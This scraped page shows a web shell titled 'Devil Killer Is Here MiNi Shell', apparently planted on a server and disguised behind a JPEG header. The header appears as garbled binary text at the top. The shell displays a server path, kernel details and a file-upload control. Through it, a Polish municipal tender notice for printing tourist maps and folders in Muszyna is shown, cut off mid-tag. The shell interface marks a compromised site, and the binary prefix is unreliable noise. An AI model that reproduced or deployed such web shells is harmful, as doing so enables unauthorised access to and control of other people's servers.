JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230223/0010843801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Muszyna-Sabinov: Wzmacniamy wspólne dziedzictwo kulturowe pogranicza polsko słowackiego publikacje – opracowanie i druk folderów informacyjnych, map informacyjnych, wydawnictwa albumowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Uzdrowiskowa Muszyna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893061</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Muszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">184714009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muszyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Muszyna-Sabinov: Wzmacniamy wspólne dziedzictwo kulturowe pogranicza polsko słowackiego publikacje – opracowanie i druk folderów informacyjnych, map informacyjnych, wydawnictwa albumowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16c4e502-b363-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00108438</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00056962/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Muszyna-Sabinov: Wzmacniamy wspólne dziedzictwo kulturowe pogranicza polsko słowackiegopublikacje – opracowanie i druk folderów informacyjnych, map informacyjnych, wydawnictwa albumowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Muszyna – Sabinov: Wzmacniamy wspólne dziedzictwo kulturowe pogranicza Polsko – Słowackiego”. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Interreg V-A Polska-Słowacja 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/muszyna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem dedykowanego formularza dostępnego na platformie zakupowej. <br/>2. Zamawiający (w sytuacjach awaryjnych, np. w przypadku niedziałania platformy zakupowej) dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, email: przetargi@muszyna.pl, zwietecha@muszyna.pl.<br/>3. Sposób sporządzenia dokumentów elektronicznych oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. <br/>4. Komunikacja poprzez Wyślij wiadomość umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit objętość plików lub spakowanego katalogu w zakresie całej wiadomości do 1 GB. <br/>5. Wykonawca otrzyma powiadomienia tj. wiadomość email dotyczącą komunikatów w sytuacji gdy Zamawiający opublikuje wiadomości publiczne/komunikaty publiczne lub spersonalizowaną wiadomość zwaną wiadomością prywatną. <br/>Szczegółowe wymagania dot. korespondencji elektronicznej określono w Rozdziale I, Podrozdział 12 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1. Administratorem Państwa danych osobowych jest Miasto i Gmina Uzdrowiskowa Muszyna, ul. Rynek 31, 33-370 Muszyna.<br/>2. Miasto i Gmina Uzdrowiskowa Muszyna wyznaczyła Inspektora Ochrony Danych Panią Dorotę Sadowską. Kontakt z Inspektorem możliwy jest przez e-mail: rodo@muszyna.pl. <br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr Zp.271.4.2023<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 ustawy. <br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. <br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>8. Posiadają Państwo: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO. <br/>9. Nie przysługuje Państwu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy <br/>Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy: <br/>− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp.271.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadania nr 1 – Mapa turystyczna<br/>Przedmiotem zamówienia jest przygotowanie przez Wykonawcę projektu graficznego, a następnie skład, przygotowanie do druku, druk i dostawa map lokalizujących atrakcje pogranicza polsko-słowackiego Gminy Muszyna i Sabinova (SK). <br/>Nakład: 5000 egz.<br/>Format: B2 - jedna karta składana do formatu mapy.<br/>Okładki mapy: stanowić będą powierzchnie widoczne po jej złożeniu.<br/>Zadruk: Obustronny w pełnym kolorze, papier G-PRINT co najmniej 115g/m²,<br/>Skala mapy: 1: 50 000 lub zbliżona, skala planu centrum Muszyny: 1:15 000 lub zbliżona, mapa/plan dojazdowy z Muszyny do Sabinova (SK).<br/>ISBN: Mapa powinna posiadać numer ISBN, który zapewnia Wykonawca<br/>Zamówienie obejmuje: opracowanie merytoryczne, w tym tekstowe w języku polskim (z korektą polonistyczną), tłumaczenie na język słowacki, opracowanie graficzne, zakup mapy, prawa autorskie do opracowanej dokumentacji, aktualne zdjęcia, skład, łamanie, wydruk, falcowanie, dostawa gotowych materiałów do Zamawiającego. <br/>Materiał będzie zawierał mapę stanowiącą zobrazowanie przestrzeni terenu Gminy Muszyna i pogranicza polsko-słowackiego, mapę dojazdową do Sabinova (SK). W opracowaniu, należy zaznaczyć wszystkie największe atrakcje: przyrodnicze, historyczne (zabytki), kulturalne. Publikacja powinna zwierać plan centrum Muszyny i teksty o atrakcjach nawiązujące do zdjęć. Mapa będzie zawierać podstawową infrastrukturę turystyczną: szlaki turystyczne piesze, rowerowe, narciarskie, atrakcje wodne (spływy pontonowe, baseny), miejsca szczególnie atrakcyjne w górach z powodów historycznych, przyrodniczych, legendę do mapy. Mapa będzie zawierać informacje o najciekawszych trasach pogranicza Gminy Muszyna i Sabinova dla zmotoryzowanych, turystów pieszych, rowerowych, kajakowych. Mapa zawierała będzie aktualne zdjęcia atrakcji Gminy Muszyna i Sabinova nawiązujących do opisów znajdujących się na mapie. <br/>Zdjęcia wykorzystane w mapie muszą być wykonane profesjonalnie. Jakość zdjęć będzie weryfikowana pod względem jakości technicznej, właściwej dla zdjęć wykorzystywanych w publikacjach (m.in. ostrość, światło) i merytorycznej (zgodnie ze wskazaniem Zamawiającego). Wykonawca zobowiązany jest do dostarczenia Zamawiającemu minimum 325 różnych zdjęć wykonanych w lokalizacjach przeznaczonych do umieszczenia na mapie, z których Zamawiający dokona wyboru minimum 65 zdjęć do umieszczenia w mapie.<br/>Teksty i materiały graficzne (zdjęcia) umieszczone w mapie w zakresie koniecznym do wykonania zamówienia muszą być wolne od wad prawnych, nie naruszać praw osób trzecich oraz nie być ograniczone w żadnym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79810000-5 - Usługi drukowania</p> <p class="mb-0">79820000-8 - Usługi związane z drukowaniem</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">79821000-5 - Drukarskie usługi wykańczalnicze</p> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">92310000-7 - Usługi tworzenia dzieł artystycznych i literackich oraz przekładu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę – 60 pkt<br/>b)	Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia. – 40 pkt<br/><br/>Punkty przyznawane za kryterium „Cena oferty (z podatkiem VAT)” oraz „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia” będą liczone wg następującego wzoru:<br/><br/>Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę <br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia.<br/><br/>Punktacja za doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia przyznane zostanie jeżeli Wykonawca wykaże, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert wykonał należycie zadanie polegające na opracowaniu tekstowym i graficznym materiałów promocyjnych.<br/>Punktacja za w/w doświadczenie przyznawana będzie w następujący sposób:<br/><br/>Wykonanie 1 opracowania w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 opracowań w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 opracowań w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej opracowań w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści przedłożonych dokumentów musi jednoznacznie wynikać, że wykazane zadania polegały na opracowaniu tekstowym i graficznym materiałów promocyjnych i zostały wykonane należycie.<br/><br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1) nieprzedłożenia wraz z ofertą dowodów potwierdzających, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych zostały wykonane należycie,<br/>2) niewykazania doświadczenia w ww. zakresie.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych opracowane zostały w okresie ostatnich 5 lat przed upływem terminu składania ofert i wykonane zostały należycie, muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego<br/><br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów.<br/>C - liczba punktów otrzymana za kryterium cena brutto.<br/>D - liczba punktów otrzymana za kryterium „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – Folder informacyjny<br/>Przedmiotem zamówienia jest przygotowanie przez Wykonawcę projektu graficznego, a następnie skład, przygotowanie do druku, druk i dostawa folderu informacyjnego atrakcji pogranicza polsko-słowackiego Gminy Muszyna i Sabinova (SK). <br/>Nakład: 5000 egz., <br/>Format: 11,5x23 cm<br/>Środek: 48 stron, zadruk pełen kolor, papier kreda 130g/m2, <br/>Okładka: Kreda 300 g/m2 + folia mat, okładka z bigowanymi skrzydełkami z dwóch stron, (skrzydełko 50 mm), szyta drutem. Na okładkach plan miasta Muszyny w skali 1: 10 000 lub zbliżony, mapa Muszyny i okolic w skali 1: 100 000 lub zbliżona, mapa dojazdowa/plan obrazujący Muszynę i Sabinov (SK).<br/>ISBN: Folder powinien posiadać numer ISBN, który zapewnia Wykonawca.<br/><br/>Zamówienie obejmuje: opracowanie merytoryczne, w tym tekstowe w języku polskim (z korektą polonistyczną), tłumaczenie na język słowacki, opracowanie graficzne, zakup map, prawa autorskie do opracowanej dokumentacji, aktualne zdjęcia, skład, łamanie, bigowanie, wydruk, dostawa gotowych materiałów do Zamawiającego. <br/>Materiał będzie zawierał największe atrakcje: przyrodnicze, historyczne (zabytki), kulturalne Gminy Muszyna i pobliskiej Słowacji (np. zamki w Plavcu i Starej Lubowni, mury obronne w Sabinovie). Przy opisach atrakcji będą umieszczone kody QR z linkami (wskazanymi przez Zamawiającego) do bardziej rozwiniętych informacji na temat atrakcji. Zdjęcia wykorzystane w folderze muszą być wykonane profesjonalnie. Jakość zdjęć będzie weryfikowana pod względem jakości technicznej, właściwej dla zdjęć wykorzystywanych w publikacjach (m.in. ostrość, światło) i merytorycznej (zgodnie ze wskazaniem Zamawiającego). Wykonawca zobowiązany jest do dostarczenia Zamawiającemu minimum 400 różnych zdjęć, w różnych porach roku, wykonanych w lokalizacjach przeznaczonych do umieszczenia na folderze, z których Zamawiający dokona wyboru minimum 100 zdjęć do umieszczenia w folderze.<br/>Teksty i materiały graficzne (zdjęcia) umieszczone w folderze w zakresie koniecznym do wykonania zamówienia muszą być wolne od wad prawnych, nie naruszać praw osób trzecich oraz nie być ograniczone w żadnym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79810000-5 - Usługi drukowania</p> <p class="mb-0">79820000-8 - Usługi związane z drukowaniem</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">79821000-5 - Drukarskie usługi wykańczalnicze</p> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">92310000-7 - Usługi tworzenia dzieł artystycznych i literackich oraz przekładu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span 